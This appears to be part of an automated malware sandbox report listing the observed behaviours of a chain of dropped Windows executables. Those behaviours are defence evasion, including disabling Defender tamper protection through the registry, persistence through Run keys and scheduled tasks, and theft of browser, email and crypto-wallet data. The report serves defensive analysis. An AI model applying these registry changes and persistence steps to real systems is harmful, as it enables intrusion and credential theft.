Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5b9d8483ee.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109130101\\5b9d8483ee.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ccfa1d9368.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109140101\\ccfa1d9368.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d9f9e120ef.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109150101\\d9f9e120ef.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\823a6efeda.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109160101\\823a6efeda.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\84mBY8Tm\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1c1e74e5ed.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\1c1e74e5ed.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
